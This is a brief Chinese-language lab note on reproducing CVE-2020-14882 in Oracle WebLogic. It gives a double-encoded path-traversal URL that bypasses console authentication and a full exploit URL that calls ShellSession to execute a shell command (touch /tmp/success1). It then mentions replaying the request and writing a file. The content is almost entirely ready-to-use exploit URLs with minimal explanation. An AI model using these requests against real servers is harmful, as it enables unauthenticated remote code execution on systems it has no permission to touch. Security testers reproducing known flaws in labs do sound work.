Weblogic
默认端口号:7001
(1)weblogic管理控制台未授权远程命令执行漏洞
CVE-2020-14882
1,拉取环境
2,访问网站
3,启动完成后,访问http://your-ip:7001/console查看管理员控制台登录页面
4,使用此 URL 绕过 Console 组件的身份验证:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
5,
访问以下 URL 以链接 2 个漏洞并执行以下命令com.tangosol.coherence.mvel2.sh.ShellSession:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
数据包,重放,执行命令
6,写入文件
上传成功